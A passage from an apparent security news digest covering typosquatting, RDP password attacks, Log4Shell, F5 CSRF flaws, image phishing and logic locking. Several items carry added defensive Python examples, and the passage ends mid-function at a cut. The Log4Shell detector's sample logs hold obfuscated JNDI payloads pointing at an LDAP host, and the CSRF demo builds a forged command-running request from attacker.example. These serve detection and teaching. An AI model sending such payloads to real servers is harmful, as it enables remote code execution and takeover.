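    so treat a hit as 'review before install', not as proof of malice.
    """
    wanted = normalize(name)
    best = None
    for k in known:
        kn = normalize(k)
        if wanted == kn:
            return None
        dist = osa_distance(wanted, kn)
        if dist <= max_distance and (best is None or dist < best[0]):
            best = (dist, k)
    if best:
        return best[1]
    for k in known:
        kn = normalize(k)
        # Only wrap-check names long enough that containment is meaningful
        if len(kn) >= 5 and kn in wanted and len(wanted) > len(kn):
            return k
    return None


def screen_requirements(lines, known=KNOWN_PACKAGES):
    """Screen requirements.txt-style lines; returns [(requested, looks_like), ...]."""
    findings = []
    for line in lines:
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        req = re.split(r"[<>=!~\[;\s]", line, maxsplit=1)[0]
        hit = typosquat_candidate(req, known)
        if hit:
            findings.append((req, hit))
    return findings
```

    Run `screen_requirements` over a requirements file in CI and fail the build on any finding; the known-package list should be the organization's own allowlist or a snapshot of the most-downloaded names, and the distance threshold of one edit is deliberately tight to keep the false-positive rate workable.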

    The Register reports "WASP Malware Stings Python Developers"

  • news

    Visible to the public "Top Passwords Used in RDP Brute-Force Attacks"

    Specops Software published a study that examined the most common passwords used in live attacks against Remote Desktop Protocol (RDP) ports. The analysis coincides with the addition of more than 34 million compromised passwords to the Specops Breached Password Protection Service, which now contains over 3 billion unique compromised passwords. RDP over Transmission Control Protocol (TCP) port 3389 is a popular way for Information Technology (IT) teams to give remote workers access to the corporate network. Although attacks on RDP ports increased during the COVID-19 pandemic with the rise of remote work, the port has remained a popular target for criminals. Password-related attacks continue to top the list of attack methods, with recent research revealing that brute-force password guessing accounts for 41 percent of all intrusion vectors. In an analysis of over 4.6 million passwords collected in October 2022 from Specops Software's honeypot system, the most common base terms found in passwords used to attack TCP port 3389 included "Password," "p@ssw0rd," "Welcome," "admin," "Passw0rd," "p@ssword," "pa$$w0rd," "qwerty," "User," and "test." Furthermore, an examination of port attack data, covering the RDP port and others, revealed several password patterns: more than 88 percent contain 12 characters or fewer, nearly 24 percent contain exactly 8 characters, and fewer than 19 percent contain only lowercase letters. This article continues to discuss key findings from the analysis of the top passwords used in live attacks against RDP ports.
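
    The attacker wordlist above is only useful to defenders if "p@ssw0rd", "Passw0rd" and "pa$$w0rd" are all recognized as the same base term. The following is an added example, not Specops' code: it reduces a password to its base term by stripping leading and trailing digits and symbols and undoing common character substitutions, checks the result against the terms quoted in the item, and reproduces the report's length and case breakdown over a set of passwords. The SAMPLE list is constructed, not honeypot data.

```python
"""Password-policy check driven by the attacker wordlist above. Added example,
not Specops' code; the SAMPLE list is constructed, not honeypot data."""
import re

# Base terms from the Specops top-ten list quoted above ("p@ssw0rd", "Passw0rd" etc.
# all reduce to "password" once substitutions are undone)
BANNED_BASE_TERMS = {"password", "welcome", "admin", "qwerty", "user", "test"}

# Common character substitutions attackers (and users) apply to dictionary words
LEET = str.maketrans({"@": "a", "4": "a", "0": "o", "$": "s", "5": "s",
                      "1": "i", "!": "i", "3": "e", "7": "t"})


def base_term(password: str) -> str:
    """Reduce a password to the dictionary word it is built on: strip leading and
    trailing digits/symbols ('Welcome123!' -> 'Welcome'), then undo substitutions
    in what remains ('P@ssw0rd' -> 'password')."""
    core = re.sub(r"^[^A-Za-z]+|[^A-Za-z]+$", "", password)
    core = core.lower().translate(LEET)
    return re.sub(r"[^a-z]", "", core)


def weaknesses(password: str) -> list:
    """Reasons this password matches the patterns seen in the RDP attack traffic."""
    reasons = []
    term = base_term(password)
    if term in BANNED_BASE_TERMS:
        reasons.append(f"base term '{term}' is on the attacker wordlist")
    if len(password) <= 12:
        reasons.append("12 characters or fewer")
    if password.isalpha() and password.islower():
        reasons.append("lowercase letters only")
    return reasons


def pattern_stats(passwords) -> dict:
    """Fractions of a password set in each category, mirroring the report's breakdown."""
    n = len(passwords)
    return {
        "12_or_fewer": sum(len(p) <= 12 for p in passwords) / n,
        "exactly_8": sum(len(p) == 8 for p in passwords) / n,
        "lowercase_only": sum(p.isalpha() and p.islower() for p in passwords) / n,
        "banned_base_term": sum(base_term(p) in BANNED_BASE_TERMS for p in passwords) / n,
    }


# Constructed sample, not data from the Specops honeypot
SAMPLE = ["P@ssw0rd", "Welcome123", "qwerty", "Admin@2022", "Tr0ub4dor&3",
          "correct horse battery staple", "test", "user1234"]
```

    Wire `weaknesses` into the password-change path for any account that can reach RDP; rejecting on base term rather than on the literal string is what stops users from satisfying complexity rules with "P@ssw0rd2022!". Blocking RDP at the perimeter and requiring MFA on the gateway still matter more than the wordlist.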

    Help Net Security reports "Top Passwords Used in RDP Brute-Force Attacks"

  • news

    Visible to the public "MITRE Engenuity Launches Evaluations for Security Service Providers"

    MITRE Engenuity has released a new set of evaluations for Managed Security Service Providers (MSSPs), which could give enterprise decision-makers a useful resource to consult when choosing a provider. The key to gaining value from the information is understanding how to interpret the results, according to MITRE and others. The first-ever MITRE Engenuity evaluation of security service providers offers detailed information on how various MSSPs analyze and describe adversary behavior to their clients. MITRE's assessment leaves it entirely up to the security professionals and teams who use the data to make vendor comparisons. For the evaluation, MITRE Engenuity gave each participating vendor the opportunity to deploy their adversary detection and monitoring tools in a MITRE-hosted Microsoft Azure environment. A MITRE purple team then carried out a simulated attack in that environment using the tactics and techniques of the well-known Iranian threat group OilRig. Participants knew that the simulated attack would take place during business hours within a two-week window, but MITRE did not tell them the specific timing, the techniques, or which adversary MITRE Engenuity was emulating. During the simulated attack, MITRE Engenuity's team demonstrated commonly used adversary tactics such as spear-phishing for initial access, credential dumping, web shell installation, lateral movement, data exfiltration, and cleanup. Vendors could use any of the tools in their Managed Detection and Response (MDR) portfolio to evaluate and report on malicious activity. However, MITRE's rules prevented them from responding to or blocking the attack, because the goal was to see how each service provider detected and analyzed the unfolding attack, and with what detail and clarity they reported their findings. This article continues to discuss MITRE Engenuity's ATT&CK Evaluations for Managed Services.

    Dark Reading reports "MITRE Engenuity Launches Evaluations for Security Service Providers"

  • news

    Visible to the public "Iranian Hackers Compromised a US Federal Agency's Network Using Log4Shell Exploit"

    Iranian government-sponsored threat actors have been linked to the compromise of a US federal agency, which involved exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server. The information comes from the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA), following incident response work the agency conducted from mid-June to mid-July 2022. Log4Shell, also known as CVE-2021-44228, is a critical Remote Code Execution (RCE) flaw in Apache Log4j, a popular Java-based logging library. The open-source project's maintainers addressed it in December 2021. However, since the beginning of the year, Iranian state-sponsored groups have been exploiting Log4j vulnerabilities in VMware Horizon servers. CISA did not attribute the incident to a specific hacking group, but a joint advisory issued in September 2022 by Australia, Canada, the UK, and the US suspected Iran's Islamic Revolutionary Guard Corps (IRGC) of exploiting the flaw. According to CISA, the affected organization was breached as early as February 2022: the attackers weaponized the vulnerability to add a new exclusion rule to Windows Defender that allowlisted the entire C: drive. As a result, the adversary was able to download a PowerShell script without triggering any antivirus scans, and that script retrieved the XMRig cryptocurrency mining software from a remote server in the form of a ZIP archive. This article continues to discuss the exploitation of the Log4Shell vulnerability by Iranian government-sponsored threat actors to compromise a US federal agency.
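
    Two checks follow directly from the incident above: finding the Log4Shell trigger (a JNDI lookup string, often disguised with nested lookups or URL-encoding) in web logs, and auditing Defender exclusions for entries as broad as a whole drive. The block below is an added example, not CISA's tooling. The log lines and exclusion list are constructed, the `Get-MpPreference` export is only suggested as a way to obtain such a list, and the obfuscation forms handled are the common ones rather than an exhaustive set.

```python
"""Two checks suggested by the incident above: spot JNDI lookup strings in web
logs (the Log4Shell trigger) and flag over-broad Defender exclusions (the
attacker's persistence step). Added example, not CISA's tooling; the log lines
and exclusion list are constructed, and the obfuscation forms handled are the
common ones, not an exhaustive list."""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} and ${anything:-x} default-value lookups are the usual ways
# the literal "jndi" is hidden; resolve them before matching.
SIMPLE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def deobfuscate(s: str, rounds: int = 10) -> str:
    """Iteratively collapse nested lookups, innermost first, until nothing changes."""
    for _ in range(rounds):
        new = SIMPLE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def find_jndi_lookups(lines):
    """Return the log lines that contain a JNDI lookup after URL-decoding and de-obfuscation."""
    return [ln for ln in lines if JNDI.search(deobfuscate(unquote(ln)))]


# Exclusion paths that disable scanning for far more than one application
OVERBROAD = [
    re.compile(r"^[A-Za-z]:\\?$"),                                                   # a whole drive, e.g. C:\
    re.compile(r"^[A-Za-z]:\\(Users|ProgramData|Windows\\Temp)\\?$", re.IGNORECASE),  # user-writable roots
    re.compile(r"\*"),                                                               # wildcard exclusions
]


def overbroad_exclusions(paths):
    """Flag Defender ExclusionPath entries that allowlist root or user-writable locations."""
    return [p for p in paths if any(r.search(p) for r in OVERBROAD)]


# Constructed sample log lines in a combined-log style; 203.0.113.0/24 is documentation space
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jun/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [20/Jun/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:ldap://203.0.113.7:1389/b}"',
    '10.0.0.7 - - [20/Jun/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}ndi:ldap://203.0.113.7:1389/c}"',
    '10.0.0.8 - - [20/Jun/2022:10:00:04 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 404 0 "-" "curl/7.81"',
    '10.0.0.9 - - [20/Jun/2022:10:00:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Constructed list, as one might export with: Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
SAMPLE_EXCLUSIONS = [
    "C:\\",
    "C:\\Program Files\\VMware\\VMware View\\Server\\",
    "C:\\Users\\",
    "D:\\Backups\\*",
]
```

    The log check is a triage aid, not proof of exploitation: a hit means the string reached a logging call, so the next step is to confirm whether the Horizon server was patched at that time and to look for the outbound LDAP or RMI connection. The exclusion audit is worth running on a schedule regardless of Log4Shell, since adding an exclusion is a cheap persistence step for any intruder with local administrator rights.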

    THN reports "Iranian Hackers Compromised a US Federal Agency's Network Using Log4Shell Exploit"

  • news

    Visible to the public "Sandia Studies Vulnerabilities of Electric Vehicle Charging Infrastructure"

    As electric vehicles become more prevalent, so do the risks and hazards of a cyberattack on electric vehicle charging equipment and systems. Jay Johnson, an electrical engineer at Sandia National Laboratories (SNL), has been researching the vulnerabilities of electric vehicle charging infrastructure. Johnson emphasized the importance of exploring electric vehicle charger vulnerabilities in order to make recommendations to policymakers and inform them of what security improvements the industry requires. The Bipartisan Infrastructure Law includes $7.5 billion in funding for electric vehicle charging infrastructure, and the federal government requires states to implement physical and cybersecurity strategies as a condition of this funding. The Sandia team's review will help states prioritize hardening requirements and help the federal government standardize best practices and mandate minimum security levels for electric vehicle chargers. Electric vehicle charging infrastructure is exposed to a range of threats, from skimming payment card data, as happens at conventional gas pumps and ATMs, to hijacking an entire network of electric vehicle chargers through its cloud servers. The team explored entry points such as vehicle-to-charger connections, wireless communications, electric vehicle operator interfaces, cloud services, and charger maintenance ports, and investigated standard AC chargers, DC fast chargers, and extreme fast chargers. The study found flaws in each interface. For example, vehicle-to-charger communications could be intercepted, and charging sessions terminated, from over 50 yards away. Electric vehicle owner interfaces were particularly vulnerable to data theft and to tampering with charger pricing. Most electric vehicle chargers use firewalls to maintain separation from the Internet, but Argonne National Laboratory (ANL) researchers discovered that some systems did not. An Idaho National Laboratory (INL) team also discovered that some systems were vulnerable to malicious firmware updates. This article continues to discuss the vulnerabilities of electric vehicle charging infrastructure.

    Sandia National Laboratories reports "Sandia Studies Vulnerabilities of Electric Vehicle Charging Infrastructure"

  • news

    Visible to the public "APT Group Pilfers $11 Million From Africa, Asia, Latin America Using Spear Phishing Emails"

    Group-IB recently published a report detailing the activities of the "OPERA1ER" Advanced Persistent Threat (APT) group, which is known for spear phishing emails, but it is unique in that it targets less economically developed countries in Africa, Asia, and Latin America. The APT group is suspected to be based in Africa because of the language used in its messages and its target selection. It has been difficult to track down, even though it has been active since 2018 and has carried out over a dozen successful attacks in some of those years. This APT group has been responsible for 35 known attacks totaling at least $11 million in damage. According to Group-IB, the actual amount could be as much as $30 million. The group primarily focuses on African countries and prefers businesses in the financial services, banking, and telecommunications industries. However, it is not afraid to occasionally venture outside of its comfort zone. With spear phishing campaigns, the group has also targeted businesses in Bangladesh, Paraguay, and Argentina. One distinguishing feature of the APT group is that it appears to use only off-the-shelf tools, rather than developing its own malware or ransomware. It is unusual for a group that does not build its own tools to last this long or be this financially successful. Part of that success is likely due to careful target selection in areas that do not see as many daily attempts as the world's largest economies. Another key to its success is a large network of "money mule" accounts used to make withdrawals and funnel funds to the APT group. Their spear phishing strategy is also referred to as "high quality," as it accurately imitates official government notices and communications from major banks. This article continues to discuss details surrounding the OPERA1ER APT group.

    CPO Magazine reports "APT Group Pilfers $11 Million From Africa, Asia, Latin America Using Spear Phishing Emails"

  • news

    Visible to the public "Resilience Seen as a Key to Critical Infrastructure Security"

    The recent string of major supply chain and critical infrastructure attacks highlighted threat actors' willingness to target those systems and the importance of organizations planning for such attacks and being able to recover from them when they occur. Incidents such as the software supply chain attacks on SolarWinds and Kaseya, as well as the ransomware attack on Colonial Pipeline, can have long-term consequences for customers and other organizations for months or even years. They can also make government agencies and defenders more aware of specific vulnerabilities and weak points that organizations have, as well as stimulate new thinking about how to address them. The DarkSide ransomware attack on the Colonial Pipeline, a major gas delivery conduit, exemplified the ever-increasing overlap between cybersecurity incidents and real-world consequences. Resilience is an important property for both critical infrastructure networks and enterprise networks, but it is not easy to achieve. Absorbing, responding to, and recovering from attacks are critical capabilities for security teams, but they need a thorough understanding of an organization's strengths and weaknesses, comprehensive planning, and the ability to redirect resources as needed. It also requires collaboration, both within and outside of the organization. The White House issued a fact sheet on critical infrastructure security, emphasizing the importance of increased collaboration with the private sector and a more attack-resistant approach. Although utilities, transportation systems, and other critical infrastructure components have all been shown to be vulnerable to cyberattacks, the good news is that many of these systems were built with resilience in mind from the start. Power companies, water companies, and rail operators must deal with a variety of disruptions on a regular basis and have contingency plans in place. This article continues to discuss the importance of bolstering resilience in critical infrastructure security.

    Decipher reports "Resilience Seen as a Key to Critical Infrastructure Security"

  • news

    Visible to the public "Firefox 107 Patches High-Impact Vulnerabilities"

    Mozilla recently announced the release of Firefox 107. The latest version of the popular web browser patches a significant number of vulnerabilities. A total of 19 CVE identifiers have been assigned to the security holes patched in Firefox 107, and nine of them carry a "high impact" rating. Mozilla noted that the high-impact flaws include issues that could lead to information disclosure, a fullscreen notification bypass that could be used for spoofing attacks, and crashes or arbitrary code execution resulting from use-after-free bugs. Multiple memory safety bugs discovered by Mozilla developers have been assigned a single CVE and a "high impact" rating. Mozilla stated that the moderate-impact issues patched in Firefox 107 can lead to security bypass, cross-site tracing, code execution, compromise via file downloads, keystroke leakage, and spoofing attacks. The low-impact issues are related to security exceptions and spoofing. Some of the vulnerabilities affect only Firefox for Android, and others only Unix-based operating systems. Mozilla also noted that many of these security holes have been patched in Thunderbird with the release of version 102.5. Firefox is not targeted by threat actors as heavily as Chrome, but its popularity still makes it a tempting target.

    SecurityWeek reports: "Firefox 107 Patches High-Impact Vulnerabilities"

  • news

    Visible to the public "Emerging Tech Can Protect Critical Infrastructure From Cyberattacks"

    The US President's Council of Advisors on Science and Technology (PCAST) met on November 9 to hear expert opinions on how to better build a cyber-resilient digital infrastructure at the national level, with current government officials backing a combination of emerging technologies and risk mitigation. The Defense Advanced Research Projects Agency (DARPA) has led efforts to fortify critical infrastructure using advanced data analytics and cybersecurity technology. Kathleen Fisher, DARPA's Information Innovation Office director, described an experiment in which her office developed sensor tools for power grids to distinguish cyberattacks from weather incidents. Failures caused by nature and accidents are very different from failures caused by cyber adversaries, she said during her presentation, emphasizing that cyber adversaries can make the system lie. In their Rapid Attack Detection, Isolation, and Characterization Systems (RADICS) program, DARPA tested a new sensor and corresponding algorithm to model power grids. RADICS successfully trained power engineers to black start a compromised power grid or restore a portion of an electric grid to operation without external power. The RADICS technology was created to detect incorrect data, isolate compromised communication channels and nodes, and implement new traffic analyses and Information Technology (IT) protocols. According to Fisher, DARPA's RADICS algorithm is now being used by several utility companies and independent state system operators. A key feature allowed electrical grid operators to conduct forensic analyses using both software and hardware to assess cyberattacks on a system and help restore grid operations in a timely manner. This article continues to discuss the RADICS program and the need for a combination of emerging technologies and risk mitigation for a cyber-resilient digital infrastructure.

    GCN reports "Emerging Tech Can Protect Critical Infrastructure From Cyberattacks"

  • news

    Visible to the public "Remote Code Execution Vulnerabilities Found in F5 Products"

    Security researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. The researchers reported their findings to the vendor in mid-August and disclosed details on Wednesday, as F5 released advisories informing customers about the security holes and the availability of engineering hotfixes. Two of the issues have been described as high-severity remote code execution vulnerabilities and assigned CVE identifiers, while the rest are security bypass methods that F5 does not view as vulnerabilities. The most serious is CVE-2022-41622, a cross-site request forgery (CSRF) issue affecting BIG-IP and BIG-IQ products. The researchers noted that exploitation can allow a remote, unauthenticated attacker to gain root access to a device's management interface, even if the interface is not exposed to the Internet. However, exploitation requires the attacker to have some knowledge of the targeted network, and they need to convince a logged-in administrator to visit a malicious website set up to exploit CVE-2022-41622. The researchers stated that, if exploited, the vulnerability can lead to a complete compromise of the system. The second vulnerability, CVE-2022-41800, allows an attacker with admin privileges to execute arbitrary shell commands via RPM specification files. The researchers also identified several other security issues, including a local privilege escalation via bad Unix socket permissions and two SELinux bypass methods. The researchers believe that widespread exploitation of these vulnerabilities is unlikely. However, they stated that F5 customers should not ignore them, considering that BIG-IP appliances have been known to be targeted by threat actors.
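
    The CSRF scenario above, a logged-in administrator whose browser is made to send a state-changing request by an attacker's page, is worth seeing as code. The following is an added example illustrating the vulnerability class generically; it is not F5's code and does not reproduce CVE-2022-41622. It shows the weak check (accept any request that carries a valid session cookie) beside a hardened one that demands a same-origin request and a session-bound token. The management host name, cookie name, header name and path are assumptions.

```python
"""Generic CSRF defense for a management interface, shown as the weak check next
to the hardened one. Added illustration of the vulnerability class in the F5
item above; it is not F5 code and does not reproduce CVE-2022-41622. The host
name, cookie and header names and the path are assumptions."""
import hashlib
import hmac
from dataclasses import dataclass, field
from urllib.parse import urlsplit

ALLOWED_ORIGIN = "https://bigip-mgmt.example.internal"   # hypothetical management host
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}                # these must never change state


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Session-bound token = HMAC(secret, session id). The browser attaches the session
    cookie to cross-site requests automatically, but an attacker's page cannot read
    this value, so it cannot be included in a forged form."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def weak_check(req: Request) -> bool:
    """The pattern CSRF abuses: a state-changing request is accepted whenever a valid
    session cookie rides along, regardless of which site initiated it."""
    return "session" in req.cookies


def hardened_check(req: Request, secret: bytes):
    """Accept a state-changing request only if it is same-origin AND carries the
    session-bound token. Returns (accepted, reason)."""
    if req.method.upper() in SAFE_METHODS:
        return True, "safe method"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if not origin:
        return False, "no Origin/Referer on state-changing request"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
        return False, f"cross-site request from {parts.scheme}://{parts.netloc}"
    sid = req.cookies.get("session")
    token = req.form.get("csrf_token") or req.headers.get("X-CSRF-Token")
    if not sid or not token:
        return False, "missing session or token"
    if not hmac.compare_digest(token, issue_csrf_token(sid, secret)):
        return False, "token does not match session"
    return True, "ok"


SECRET = b"server-side-secret-never-sent-to-clients"   # constructed for the example


def forged_request():
    """What a malicious page visited by a logged-in admin produces: a POST carrying
    the victim's cookie but the attacker's origin and no token."""
    return Request("POST", "/mgmt/run-command",
                   headers={"Origin": "https://attacker.example"},
                   cookies={"session": "admin-session-123"},
                   form={"cmd": "id"})


def legitimate_request():
    sid = "admin-session-123"
    return Request("POST", "/mgmt/run-command",
                   headers={"Origin": ALLOWED_ORIGIN},
                   cookies={"session": sid},
                   form={"cmd": "id", "csrf_token": issue_csrf_token(sid, SECRET)})
```

    The origin check and the token are independent layers: the origin check fails open if a proxy strips headers, and the token fails if the same value is reused across sessions, which is why the token here is derived from the session identifier. A `SameSite=Lax` or `Strict` attribute on the session cookie is a third layer worth adding; none of them help if a GET endpoint changes state.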

    SecurityWeek reports: "Remote Code Execution Vulnerabilities Found in F5 Products"

  • news

    Visible to the public "New Image-Based Scam Bypasses Filtering, Encourages Victims to Call Attacker"

    INKY Technology researchers have detailed a new image-based phishing scam that uses brand impersonation to encourage victims to call the scammers rather than click on a link or download a file. The researchers observed malicious actors using an image-based phishing technique in phone scams, sending a phishing email whose entire message is embedded in an attached image. Phishers compose an email, convert it to an image, and then send the image to their victims. Because most email clients display the image inline rather than showing a blank email with an image attached, recipients will be unaware that they are viewing a screenshot rather than rendered HTML text. The email also appears safe because there are no links to click or attachments to open. The goal of sending the phishing message as an image is to avoid anti-spam and email security scanning, since there is no text in the email for filters to inspect. In one case, the researchers observed bad actors impersonating Geek Squad, with potential victims receiving an email stating that their Geek Squad subscription had been renewed for a year and that a large sum of money would be debited from their accounts within 24 hours. When recipients call the phone number listed in the email, they are offered ways to prevent the payment from going through, including installing remote access tools on their computers. Victims are then directed to a malicious website where banking information is requested, and are instructed to purchase gift cards in order to be reimbursed for the Geek Squad charges. The technique's effectiveness rests on instilling fear in victims that they are about to be charged for goods or services they did not purchase. Those behind the scam hope that by eliciting an emotional response they will impair victims' judgment and cause them to fall for the bait. This article continues to discuss the image-based phishing scam.
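
    A filter that only inspects text will see nothing in the message described above, so the useful signals are structural: an image part carrying the message with almost no readable text, plus a phone number and no links once the image is OCR'd. The block below is an added example of that triage logic, not INKY's detector. The sample message is constructed with the standard library, and OCR is left out: the `ocr_text` argument stands in for whatever an OCR step would recover from the attached image.

```python
"""Heuristic triage for image-only phishing mail, added as an illustration of the
technique INKY describes; not INKY's detector. The sample message is constructed
with the standard library, and OCR is left out: `ocr_text` stands in for whatever
an OCR step would extract from the attached image."""
import re
from email import message_from_string, policy
from email.message import EmailMessage

# North American phone-number shapes; a real deployment would use a locale-aware matcher
PHONE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
LINK = re.compile(r"https?://", re.IGNORECASE)


def triage(raw_message: str, ocr_text: str = "") -> dict:
    """Count readable text, links and image parts; flag an image-carried message that
    pushes a callback number. `ocr_text` is text recovered from the image(s), if any."""
    msg = message_from_string(raw_message, policy=policy.default)
    text_chars = links = image_parts = 0
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype in ("text/plain", "text/html"):
            body = part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")
            links += len(LINK.findall(body))
            text_chars += len(re.sub(r"<[^>]+>", " ", body).strip())
        elif part.get_content_maintype() == "image":
            image_parts += 1
    phones = PHONE.findall(ocr_text)
    flags = []
    if image_parts and text_chars < 20:
        flags.append("image carries the message; scanner sees no text")
    if phones and links == 0:
        flags.append("callback number with no links: phone-scam pattern")
    return {"text_chars": text_chars, "links": links, "image_parts": image_parts,
            "phones": phones, "flags": flags}


def build_image_only_sample() -> str:
    """Constructed lure: a whitespace-only text body plus a PNG 'invoice' (header bytes only)."""
    msg = EmailMessage()
    msg["From"] = "Billing <billing@example.net>"     # constructed sender
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Your subscription has been renewed"
    msg.set_content(" ")
    png_stub = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # not a valid image, just bytes for the part
    msg.add_attachment(png_stub, maintype="image", subtype="png", filename="renewal.png")
    return msg.as_string()


def build_text_sample() -> str:
    """Constructed ordinary notification for comparison."""
    msg = EmailMessage()
    msg["From"] = "Billing <billing@example.net>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Your invoice"
    msg.set_content("Your invoice is ready at https://billing.example.net/inv/42")
    return msg.as_string()
```

    The first flag alone is noisy (marketing mail is often one big image), so route image-only messages to an OCR step and act on the combination: OCR text that contains a phone number and urgency language, with no links, is the pattern the item describes. Whatever the mail gateway does, the operational control is the same as for any callback scam: users should verify charges through the vendor's published number, never the one in the message.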

    SiliconANGLE reports "New Image-Based Scam Bypasses Filtering, Encourages Victims to Call Attacker"

  • news

    Visible to the public "Carnegie Mellon to Host NSA GenCyber Experience for Local High School Teachers"

    Carnegie Mellon University's (CMU) picoCTF for the National Security Agency (NSA) GenCyber Teacher Program is designed for local tri-state area high school computer science teachers in grades 10 through 12. The program will demonstrate to teachers how to incorporate online cybersecurity Capture-The-Flag (CTF) problems and competitions into the classroom to help students develop cybersecurity knowledge and skills. This initiative also aims to get students more interested in cyber-related careers. The 2023 camp will be held on CMU's Pittsburgh Campus from Monday, June 26 to Friday, June 30. Because space is limited, organizers advise interested teachers to sign up early to ensure their place in the program. According to the picoCTF website, the program provides free education opportunities on cybersecurity knowledge and skills typically taught at the Bachelor's/Master's level, such as cross-site scripting (XSS) attacks and their defenses, allowing participants to feel more comfortable using the content in their classrooms. The program also shows how all six GenCyber Cybersecurity Concepts and cyber ethics manifest in the design of secure computer systems, the practice of real-world cybersecurity professionals, and everyday cyber-computing experience. This article continues to discuss the 2023 picoCTF for GenCyber Teacher Program.

    CyLab reports "Carnegie Mellon to Host NSA GenCyber Experience for Local High School Teachers"

  • news

    Visible to the public "Google Ready to Roll Out Android Privacy Sandbox in Beta"

    Google recently announced plans to roll out the Android Privacy Sandbox in beta starting early next year, aiming to deliver a more private advertising experience to mobile users. The initiative was first announced in February, and a developer preview was released in May. Google noted that Privacy Sandbox on Android is meant to limit the sharing of user data and prevent cross-app identifiers, such as advertising IDs, while still supporting developers and businesses that target mobile devices. In May, Google offered an early look at the SDK Runtime and Topics API associated with the Privacy Sandbox, allowing interested parties to test the technologies and plan adoption paths. Now, Google says it has improved and refined these tools based on the feedback received, and that it will continue to deliver new features in developer preview while kicking off the beta rollout. Google stated that, going forward, developers interested in testing Privacy Sandbox APIs (including Topics, FLEDGE, and Attribution Reporting) will have to complete an enrollment process meant to verify their identity and gather data required by the APIs. Both ad tech and app developers interested in including these ads-related APIs in their solutions can participate. Google noted that the Privacy Sandbox beta will require developers to use an API level 33 SDK extension update set to be released soon. Google encourages companies that use third-party solutions for ad serving or ad measurement to work with their providers to participate in the testing of Privacy Sandbox.

    SecurityWeek reports: "Google Ready to Roll Out Android Privacy Sandbox in Beta"

  • news

    Visible to the public "Hard to Crack Hardware"

    To help defend against malicious attacks, next-generation electronic devices may include enhanced security systems built directly into their circuitry. According to KAUST researchers, protective "logic locks" based on an advanced branch of electronics known as spintronics could be incorporated into the integrated circuits of electronic chips to bolster chip security. Yehia Massoud of KAUST says the need for hardware-based security features reflects the globalized nature of modern electronics manufacturing. Electronics companies typically use large specialized, external foundries to produce their chips, which reduces costs but introduces potential supply chain vulnerabilities. An untrustworthy foundry could illegally copy the circuit design to produce counterfeit chips, or the design could be maliciously modified by inserting "hardware Trojans" into the circuitry that alter its behavior in some way. Security approaches such as logic locking are now widely used to increase confidence in the globalized integrated circuit manufacturing chain, according to Divyanshu, a Ph.D. student in Massoud's labs. To protect chip security, the team created an integrated circuit logic lock based on a Magnetic Tunnel Junction (MTJ) component. This article continues to discuss advanced electronic components based on spintronic concepts that add more protection to smart devices.
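
    Logic locking is easier to reason about with a toy netlist in front of you. The block below is an added illustration of the general idea, not the KAUST design, and it models nothing spintronic: XOR and XNOR "key gates" are inserted on two internal nets of a small constructed function, chosen at design time so that only the correct key bits turn them into pass-throughs. Any other key corrupts the output for some inputs, which is what makes a copied-but-unkeyed chip useless. The reference function and key are constructed.

```python
"""A toy of the logic-locking idea from the item above: XOR/XNOR 'key gates' are
inserted on internal nets so the chip computes the intended function only when
the correct key is applied. Added illustration; it is not the KAUST design and
models nothing spintronic. The reference function and key are constructed."""
from itertools import product


def reference(a, b, c, d):
    """The function the designer actually wants the chip to compute (constructed)."""
    return (a & b) | (c ^ d)


# Design-time secret. For each key gate, key bit 1 means an XNOR gate was inserted and
# key bit 0 an XOR gate, so that the correct bit turns the gate into a pass-through.
KEY = (1, 0)
GATE_KINDS = tuple("xnor" if bit else "xor" for bit in KEY)


def key_gate(net, key_bit, kind):
    """An XOR key gate passes the net unchanged when key_bit is 0, an XNOR key gate
    when key_bit is 1. Any other key bit inverts the net."""
    out = net ^ key_bit
    return out if kind == "xor" else 1 - out


def locked(a, b, c, d, key):
    """The netlist as manufactured: two key gates on two different internal nets.
    Putting both on one path would let two wrong bits cancel each other out."""
    n1 = key_gate(a & b, key[0], GATE_KINDS[0])
    n2 = key_gate(c ^ d, key[1], GATE_KINDS[1])
    return n1 | n2


def correctness(key):
    """Fraction of the 16 input patterns for which the locked chip matches the reference."""
    inputs = list(product((0, 1), repeat=4))
    return sum(locked(*x, key) == reference(*x) for x in inputs) / len(inputs)


def keys_that_unlock():
    """Brute force over the (tiny) key space; a real key is hundreds of bits."""
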